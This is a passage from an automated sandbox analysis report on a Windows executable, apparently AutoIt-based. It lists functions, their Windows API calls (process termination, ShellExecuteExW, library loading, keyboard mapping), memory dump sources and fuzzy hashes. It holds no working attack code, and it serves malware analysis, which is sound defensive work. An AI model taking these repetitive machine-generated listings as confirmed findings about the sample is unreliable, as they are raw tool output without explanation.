                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: ca7a20b2680bab51f082f9c278e3c13146f9166b3eddffcd8c4f58695ab29485
                                      • Instruction ID: 6ee616bbacbf461e43c94412ee40ff93b1dfcd4d536ab5a1397611864262d871
                                      • Opcode Fuzzy Hash: ca7a20b2680bab51f082f9c278e3c13146f9166b3eddffcd8c4f58695ab29485
                                      • Instruction Fuzzy Hash: 8501247271E311BEBE6427787C85A672B94FB273793200229F520C0AF0EF114D02B144
                                      Function 008B2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,008B5686,008C3CD6,?,00000000,?,008B5B6A,?,?,?,?,?,008AE6D1,?,00948A48), ref: 008B2D78
                                      • _free.LIBCMT ref: 008B2DAB
                                      • _free.LIBCMT ref: 008B2DD3
                                      • SetLastError.KERNEL32(00000000,?,?,?,?,008AE6D1,?,00948A48,00000010,00884F4A,?,?,00000000,008C3CD6), ref: 008B2DE0
                                      • SetLastError.KERNEL32(00000000,?,?,?,?,008AE6D1,?,00948A48,00000010,00884F4A,?,?,00000000,008C3CD6), ref: 008B2DEC
                                      • _abort.LIBCMT ref: 008B2DF2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: 3d32ca3fd856139ac462fc77e73703ad90162779b9897429da2d345f549f29fc
                                      • Instruction ID: f185f2643d38204ac1d846ec666a8c8672a3e55a589da851fc8ad7a496aa1704
                                      • Opcode Fuzzy Hash: 3d32ca3fd856139ac462fc77e73703ad90162779b9897429da2d345f549f29fc
                                      • Instruction Fuzzy Hash: BAF0C875649A046BC622373CBC0AEEA2959FFC67A5F284518F834D23D6EF2488065162
                                      Function 00918A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00899693
                                        • Part of subcall function 00899639: SelectObject.GDI32(?,00000000), ref: 008996A2
                                        • Part of subcall function 00899639: BeginPath.GDI32(?), ref: 008996B9
                                        • Part of subcall function 00899639: SelectObject.GDI32(?,00000000), ref: 008996E2
                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00918A4E
                                      • LineTo.GDI32(?,00000003,00000000), ref: 00918A62
                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00918A70
                                      • LineTo.GDI32(?,00000000,00000003), ref: 00918A80
                                      • EndPath.GDI32(?), ref: 00918A90
                                      • StrokePath.GDI32(?), ref: 00918AA0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      • Opcode ID: a2f2b3692d8c34452dbec43ffd84f7627250728763ca3678504e5fd898ee9948
                                      • Instruction ID: cb8fda8d3bde00c36009196442a4b08fa2ca04164ad8a65d79b3f0eecca3a543
                                      • Opcode Fuzzy Hash: a2f2b3692d8c34452dbec43ffd84f7627250728763ca3678504e5fd898ee9948
                                      • Instruction Fuzzy Hash: AE11E576144108FFDF129F94EC88EEA7F6CEB08390F048012FA199A1A1C7719D55EBA0
                                      Function 008E51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 008E5218
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 008E5229
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008E5230
                                      • ReleaseDC.USER32(00000000,00000000), ref: 008E5238
                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 008E524F
                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 008E5261
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 2454a815bb22edc89d2d6e7aa81e1266d3dc084ae2ab57ac166c210183a76660
                                      • Instruction ID: 1b9abf71610119290a16c45e39029a8be3aaded0efd0a3a4e8302386f3db4c3b
                                      • Opcode Fuzzy Hash: 2454a815bb22edc89d2d6e7aa81e1266d3dc084ae2ab57ac166c210183a76660
                                      • Instruction Fuzzy Hash: F50184B5B44709BBEB105BA69C49A9EBF78FB48351F048065FA04E7281D6709800DF60
                                      Function 00881BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00881BF4
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00881BFC
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00881C07
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00881C12
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00881C1A
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00881C22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: 16c1cc44cfa73a163f3d4794591af7fc88826896cefd2f29628c6c2e01ec0569
                                      • Instruction ID: 43b4f5ebbae07e587a17ff093cdc11bcb602bc819a3172fc047a8a804c40baec
                                      • Opcode Fuzzy Hash: 16c1cc44cfa73a163f3d4794591af7fc88826896cefd2f29628c6c2e01ec0569
                                      • Instruction Fuzzy Hash: 1D016CB094275ABDE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5
                                      Function 008EEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008EEB30
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008EEB46
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 008EEB55
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008EEB64
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008EEB6E
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008EEB75
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      • Opcode ID: 999c1e9b310ea554daa40ce3d0443ba20b33e367aac32a9b737bbec789e1ca05
                                      • Instruction ID: d8269ba321d3b336a7785e02badcfc7e32522e6530474677a142580f44988d9b
                                      • Opcode Fuzzy Hash: 999c1e9b310ea554daa40ce3d0443ba20b33e367aac32a9b737bbec789e1ca05
                                      • Instruction Fuzzy Hash: E4F090B2294159BBE72157529C0DEEF3A7CEFCAB51F008158F611D1090D7A01A01D6B4
                                      Function 008D7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClientRect.USER32(?), ref: 008D7452
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 008D7469
                                      • GetWindowDC.USER32(?), ref: 008D7475
                                      • GetPixel.GDI32(00000000,?,?), ref: 008D7484
                                      • ReleaseDC.USER32(?,00000000), ref: 008D7496
                                      • GetSysColor.USER32(00000005), ref: 008D74B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                      • String ID:
                                      • API String ID: 272304278-0
                                      • Opcode ID: 9cfff0de9047ecf77a32ec82c174b8760a7e477e6fba7236faf2fecfe0d5ba70
                                      • Instruction ID: 4b83decb7dde45e624c6a0de3102081badacf3184200cfab1e24ca9c55346caf
                                      • Opcode Fuzzy Hash: 9cfff0de9047ecf77a32ec82c174b8760a7e477e6fba7236faf2fecfe0d5ba70
                                      • Instruction Fuzzy Hash: BF01AD71658219FFDB525F64DC08BEA7BB6FF04311F508164FA16A21A0CB311E41FB10
                                      Function 008EC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00887620: _wcslen.LIBCMT ref: 00887625
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008EC6EE
                                      • _wcslen.LIBCMT ref: 008EC735
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008EC79C
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008EC7CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info_wcslen$Default
                                      • String ID: 0
                                      • API String ID: 1227352736-4108050209
                                      • Opcode ID: 7dec7cb8286912c8797803026a66599bb31aabbf9cc70edc07de6d21f872f6cd
                                      • Instruction ID: 2b500c26fa6c46075b3b10a7efbd717e22b170c23f94ff9043d2e51ea270d9a1
                                      • Opcode Fuzzy Hash: 7dec7cb8286912c8797803026a66599bb31aabbf9cc70edc07de6d21f872f6cd
                                      • Instruction Fuzzy Hash: A651BE71A183809BD714AF2ECC85B6B7BE4FF9B314F040A2DF995D21A1DB60D8068B52
                                      Function 0090AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0090AEA3
                                        • Part of subcall function 00887620: _wcslen.LIBCMT ref: 00887625
                                      • GetProcessId.KERNEL32(00000000), ref: 0090AF38
                                      • CloseHandle.KERNEL32(00000000), ref: 0090AF67
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                      • String ID: <$@
                                      • API String ID: 146682121-1426351568
                                      • Opcode ID: a6e638e1583955fb6f63b64764cd0ad0a05500c62279ae265e2b4afb279e4ea3
                                      • Instruction ID: 0b28187f59c2ad4b40feeb439870b3e52cf74244ef37e018f447fc039c8b9fce
                                      • Opcode Fuzzy Hash: a6e638e1583955fb6f63b64764cd0ad0a05500c62279ae265e2b4afb279e4ea3
                                      • Instruction Fuzzy Hash: 29716C71A00615DFCB14EF58C484A9EBBF4FF08314F148499E856AB7A2CB74ED45CBA2
                                      Function 008E719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 008E7206
                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008E723C
                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008E724D
                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008E72CF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: DllGetClassObject
                                      • API String ID: 753597075-1075368562
                                      • Opcode ID: d774b500792d86591a09261700bb32266f86ecdd9122eca17353e0fef455a707
                                      • Instruction ID: 9046a5ac70f75e809ee431b6649f75a0f6903df14bf59b71dc03e4a4ddfe5f5d
                                      • Opcode Fuzzy Hash: d774b500792d86591a09261700bb32266f86ecdd9122eca17353e0fef455a707
                                      • Instruction Fuzzy Hash: D84181B1604245EFDB15CF55C884A9A7BB9FF46314F1480A9BE0ADF20AD7B1DD44CBA0
                                      Function 00912F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00912F8D
                                      • LoadLibraryW.KERNEL32(?), ref: 00912F94
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00912FA9
                                      • DestroyWindow.USER32(?), ref: 00912FB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                      • String ID: SysAnimate32
                                      • API String ID: 3529120543-1011021900
                                      • Opcode ID: 90efe359bf401b919a290a3d3f79ca9b8ed4ead5d8ca14518154a4c405dcde27
                                      • Instruction ID: f673deab115d1b530e0165cf11000a2ea264f59c84a9b8521d29d3f3d5982bfd
                                      • Opcode Fuzzy Hash: 90efe359bf401b919a290a3d3f79ca9b8ed4ead5d8ca14518154a4c405dcde27
                                      • Instruction Fuzzy Hash: 9821AC71304209ABEB116FA4DC84FFB77BDEB59364F104618FA60D22A0D771DCA2A760
                                      Function 008A4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008A4D1E,008B28E9,?,008A4CBE,008B28E9,009488B8,0000000C,008A4E15,008B28E9,00000002), ref: 008A4D8D
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008A4DA0
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,008A4D1E,008B28E9,?,008A4CBE,008B28E9,009488B8,0000000C,008A4E15,008B28E9,00000002,00000000), ref: 008A4DC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 4c35dd101238ba5324cd7ed5a0d88409c3abf6e211cb0064fd8b7e6277539da4
                                      • Instruction ID: 67f54e99e3183c624d8b34fdb0fce4feafb5b33cd8d01d8461ff99d9b3da0fa4
                                      • Opcode Fuzzy Hash: 4c35dd101238ba5324cd7ed5a0d88409c3abf6e211cb0064fd8b7e6277539da4
                                      • Instruction Fuzzy Hash: E7F0AF74A94218BBEB109F94DC49BEDBBB8EF85751F0040A4F905E2660CB709940EA90
                                      Function 00884E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00884EDD,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E9C
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00884EAE
                                      • FreeLibrary.KERNEL32(00000000,?,?,00884EDD,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884EC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 145871493-3689287502
                                      • Opcode ID: 2b00d753eb2eeea5f33f3b9971554962bc645640f85ca36ad24b6f724ec8c24f
                                      • Instruction ID: c3e4581e1ff17ee4c98fa0c32201f9cc99ed69e8004a56943b5ed2cbc70d358f
                                      • Opcode Fuzzy Hash: 2b00d753eb2eeea5f33f3b9971554962bc645640f85ca36ad24b6f724ec8c24f
                                      • Instruction Fuzzy Hash: 29E08C76BAA623AB93222B25AC18AAB6658FFC1B72B054115FC04E2200DB60CD01D2A0
                                      Function 00884E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,008C3CDE,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E62
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00884E74
                                      • FreeLibrary.KERNEL32(00000000,?,?,008C3CDE,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E87
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
